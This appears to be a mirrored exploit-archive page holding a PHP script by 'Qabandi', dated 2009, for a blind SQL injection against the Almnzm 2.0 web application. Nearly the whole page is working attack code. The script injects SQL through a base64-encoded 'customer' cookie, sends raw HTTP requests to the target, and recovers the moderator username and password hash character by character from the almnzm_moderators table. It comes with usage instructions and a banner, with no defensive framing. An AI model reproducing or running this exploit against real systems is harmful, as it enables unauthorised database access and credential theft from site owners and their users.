[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Almnzm 2.0 Remote Blind SQL Injection Exploit
# Published : 2009-07-02
# Author : Qabandi
# Previous Title : AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability
# Next Title : conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Vuln
<?php
ini_set("max_execution_time",0);
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ__
[q] Almnzm 2.0 Blind SQL Inj. __/QQQ/````````````````QQQ___
_/QQQQQ/ QQQQQQ
[q] Cookie <3 /QQQQ/`` ```QQQQ
/QQQQ/ QQQQ
[q] http://www.almnzm.com |QQQQ/ By Qabandi QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ iqa[a]hotmail.fr /QQQQ|
[/] -[Tam al tableegh]- QQQQ __ /QQQQ/
QQQQ /QQ_QQQQ/
QQQQ QQQQQQQ/
QQQQQ /QQQQQ/_
``QQQQQ_____________/QQQ/QQQQ_
``QQQQQQQQQQQQQQQQQQQ/ `QQQQ
``````````````````` `````
______________________________________________________________________________
/
| hediya, because i finished exams |
______________________________________________________________________________/
No More Private /
`````````````````
');
if ($argc<6) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/ user_id username password
example: php '.$argv[0].' almnzm.com /demo/ 1 almnzm test
-----------------------------------------------------------------------------
');
die;
}
function QABANDI($victim,$vic_dir,$user_id,$user_name,$user_pass,$injection){
$host = $victim;
$usrid= $user_id;
$usrnm= $user_name;
$usrpw= $user_pass;
$p = "http://".$host.$vic_dir;
$user_id_inj = $usrid.$injection;
$qookie = base64_encode($user_id_inj."[:-:]".$usrnm."[:-:]".md5($usrpw));
$packet ="GET ".$p."index.php?a=customerarea HTTP/1.0rn";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn";
$packet.="Pragma: no-cachern";
$packet.="Cookie: customer=".$qookie.";rn";
$packet.="Connection: Closernrn";
$o = @fsockopen($host, 80);
if(!$o){
echo "n[x] No response...n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "n[x] 404 Not Found... Make sure of path. n";
die;
}
return $data;
}
$host1 = $argv[1];
$userdir1=$argv[2];
$userid1= $argv[3];
$username1= $argv[4];
$userpass1= $argv[5];
if ($argc > 2) {
echo "nPlease wait, this will take time, el9abr zain ;)n";
$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
echo "nExploiting:n";
$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0");
$laenge = strlen($q);
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
if ($j>9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i));
}
if ($j<=9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i));
}
if (abs((100-($laenge/$r*100))) > $t-1) {
if ($j>9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
}
if ($j<=9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
}
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
if ($j>9){
$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i);
}
if ($j<=9){
$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i);
}
$laenge = strlen($hg);
if (abs((100-($laenge/$r*100))) > $t-1) {
if ($j>9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
}
if ($j<=9){
$laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
}
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
# www.Syue.com [2009-07-02]